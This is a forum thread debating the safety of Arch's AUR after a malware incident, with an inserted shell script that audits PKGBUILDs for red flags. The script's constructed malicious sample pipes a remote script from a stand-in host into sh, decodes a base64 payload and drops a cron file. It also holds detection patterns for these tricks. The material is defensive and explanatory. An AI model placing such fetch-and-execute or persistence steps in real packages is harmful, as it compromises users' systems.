• Sonalder@lemmy.ml · 7 up / 3 down · 13 hours ago (edited)

    AUR has never been a good idea. I don’t use it and this news proved me right.

    Does that mean a distro official package manager would be immune to infections? Of course not, but they do offer a more secure distribution system and build greater trust. Minimizing the chance of malware being spread through their means.

    Edit: If you have the knowledge and time to inspect the AUR packages you install, AUR might be good for you. I have neither, which is why I stick to my official distro packages (and sometimes also some Flatpaks, but from official sources).

    • communism@lemmy.ml · 2 up · 26 minutes ago

      It’s just a repository of user-contributed packages. It’s no different malware-ability-wise to, say, GitHub. If you are running code you found from a stranger on the internet then you are liable for it, and you need to do your due diligence in checking that you are not running malware. It is a good thing that the AUR exists because it means Arch user packages are all in one centralised repository instead of scattered across GitHub, Sourceforge, Codeberg, Pastebin, forums, whatever. If you are just installing random AUR packages then that’s on you. It’s basic internet safety to not automatically trust random scripts you find on the internet.

        • Sonalder@lemmy.ml · 1 up · 5 minutes ago

        I never said that GitHub was better. I just don’t feel like using a package maintained by a stranger with no ties to either the software I want to install or the distribution’s package repository.

        Of course, installing random code from a stranger is never great advice regardless of the distribution source. But AUR is simply not for me, and many users don’t understand the risk, or let’s say the responsibilities, it involves when installing packages from that source.
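The "due diligence" communism describes and the "inspect the AUR packages you install" that Sonalder mentions, as an added example that is not code from either commenter, from the thread, or from the AUR project: a small POSIX shell pass over a PKGBUILD that lists every URL in it and flags the patterns a malicious package usually needs (unverified downloads, fetch-and-execute in a build step, encoded payloads, root-run install scripts, files dropped outside `$pkgdir`). Both PKGBUILD texts, the package names and the hosts `example.org` / `files.example.net` are constructed for illustration. The checks are heuristics to direct a reader's attention; they do not replace reading the whole file and the `.install` script.

```shell
#!/bin/sh
# Added example, not code from the thread: a red-flag pass over an AUR
# PKGBUILD before running makepkg. Both PKGBUILD texts below are constructed
# for illustration; the package names and hosts are made up.

# audit_pkgbuild FILE
# Prints one line per finding. "url:" lines list every URL in the file so the
# reviewer can compare hosts with the upstream project; the other lines are
# heuristics for the patterns a malicious PKGBUILD tends to rely on.
# It always exits 0: the point is to read the output, not to gate on it.
audit_pkgbuild() {
    f="$1"
    # Every URL, whether in url=, source= or a build step.
    grep -Eo "(https?|git\+https?|ftp)://[^'\")[:space:]]+" "$f" | sed 's/^/url: /'
    # 'SKIP' turns off makepkg's checksum verification for that entry. Normal
    # for VCS sources (git+https://...), suspicious for a fixed tarball or script.
    grep -q "'SKIP'" "$f" && echo "SKIP checksum: a downloaded file will not be verified"
    # Fetch-and-execute in build()/package() bypasses source= and the checksums entirely.
    grep -Eq "(curl|wget)[^|]*[|][[:space:]]*(ba)?sh" "$f" && echo "pipe-to-shell: remote script executed during build"
    grep -Eq "base64[[:space:]]+(-d|--decode)" "$f" && echo "base64 decode: possibly obfuscated payload"
    # install= names a script whose post_install() runs as root during pacman -U.
    grep -Eq "^install=" "$f" && echo "install script: runs as root at install time, read it as well"
    # Paths outside "$pkgdir" are not tracked by pacman and survive pacman -R.
    grep -E '(/etc/|/home/|\$HOME|/root/)' "$f" | grep -vq '\$pkgdir' \
        && echo "writes outside \$pkgdir: files pacman will not track or remove"
    return 0
}

# A constructed PKGBUILD showing the red flags (not a real AUR package).
sample_pkgbuild() {
    cat <<'EOF'
# Maintainer: nobody (constructed example)
pkgname=example-tool
pkgver=1.2.3
pkgrel=1
arch=('x86_64')
url="https://example.org/example-tool"
license=('MIT')
install=example-tool.install
source=("https://example.org/example-tool-$pkgver.tar.gz"
        "helper.sh::https://files.example.net/dl/h.sh")
sha256sums=('0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef'
            'SKIP')

build() {
  cd "$pkgname-$pkgver"
  curl -fsSL https://files.example.net/setup.sh | sh
  echo "$PAYLOAD" | base64 -d > /tmp/stage
}

package() {
  cd "$pkgname-$pkgver"
  install -Dm755 example-tool "$pkgdir/usr/bin/example-tool"
  mkdir -p /etc/cron.d && cp helper.sh /etc/cron.d/example-tool
}
EOF
}

# A constructed PKGBUILD with nothing to flag: one upstream source, a pinned
# checksum, everything installed under "$pkgdir".
clean_pkgbuild() {
    cat <<'EOF'
pkgname=clean-tool
pkgver=2.0.0
pkgrel=1
arch=('x86_64')
url="https://example.org/clean-tool"
license=('MIT')
source=("https://example.org/clean-tool-$pkgver.tar.gz")
sha256sums=('fedcba9876543210fedcba9876543210fedcba9876543210fedcba9876543210')

build() {
  cd "$pkgname-$pkgver"
  make
}

package() {
  cd "$pkgname-$pkgver"
  install -Dm755 clean-tool "$pkgdir/usr/bin/clean-tool"
  install -Dm644 clean-tool.service "$pkgdir/usr/lib/systemd/system/clean-tool.service"
}
EOF
}

# Demo: audit both constructed files. With a real package this would be
#   git clone https://aur.archlinux.org/<pkg>.git && audit_pkgbuild <pkg>/PKGBUILD
tmp=$(mktemp)
sample_pkgbuild > "$tmp"; echo "== example-tool =="; audit_pkgbuild "$tmp"
clean_pkgbuild  > "$tmp"; echo "== clean-tool ==";   audit_pkgbuild "$tmp"
rm -f "$tmp"
```

On the constructed `example-tool` the pass prints four `url:` lines and five findings; on `clean-tool` it prints only its two URLs. A legitimate `-git` package will trip the SKIP check by design, which is why the output is meant to be read rather than used as a pass/fail gate.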

    • HaraldvonBlauzahn@feddit.org · 2 up · 2 hours ago (edited)

      AUR has never been a good idea. I don’t use it and this news proved me right.

      But is Arch sufficiently complete without AUR packages? It is being criticized - and rightly so - that the magnificent Arch Wiki is full of references to AUR packages. That could in fact mislead new users.

      I have been a happy Arch user for about ten years… But I use it differently. I am running Debian stable on the hardware, which has all the drivers I need (after getting rid of NVidia graphics, which was just a mistake to buy). I use Debian for my work / office / productivity system, to read email, and so on.

      But for some stuff, I need newer software: For trying out new features or libraries (I am a developer). For testing out new window managers. Leisure programming. And so on. I use Arch for this. After a few years of dual booting (which caused occasional breakage), I settled on running Arch in a VM. Which works fine for me.

      And the last shift I am experiencing is that I use the Guix package manager more and more. The reason for this is that when one tries out a lot of things, and does only system upgrades for many years (which means not doing a reinstall, but replacing the oldstable packages with the newer stable packages), the system becomes a bit untidy over time. Old packages, scripts, and configurations accumulate, and it is hard to get rid of them without breaking things, because one just cannot delete everything one no longer remembers the purpose of. And there is so much stuff in software that, after all, turns out to be not such a good idea. Yes, a fresh OS install leaves a tidy system, but it would cost a few days. (By the way, accumulating cruft in the long term is also somewhat of a disadvantage of rolling release distros.)

      Now, Guix solves that, because I have a temporary, deterministic environment for every programming project (just like a Python venv). And this way, stuff does not contaminate the base system, and is garbage collected when it is not used any more.

      And, Guix has quite recent packages, similar to Arch.

      Now I use Arch less and less.

      • Hund@feddit.nu · 1 up · 28 minutes ago

        The issue with Arch is that they have like no packages at all. You’re more or less forced to use the AUR. Which is not something I would recommend to anyone. Which is also why I don’t recommend Arch to anyone. :D

    • HaraldvonBlauzahn@feddit.org · 4 up · 12 hours ago

      Minimizing the chance of malware being spread through their means.

      Right. And there is another angle to that: It is far easier to turn an ecosystem into a breeding ground for malware than to get rid of it again. Once a system has a reputation for being easily hackable, it attracts malware like spoiled meat attracts flies.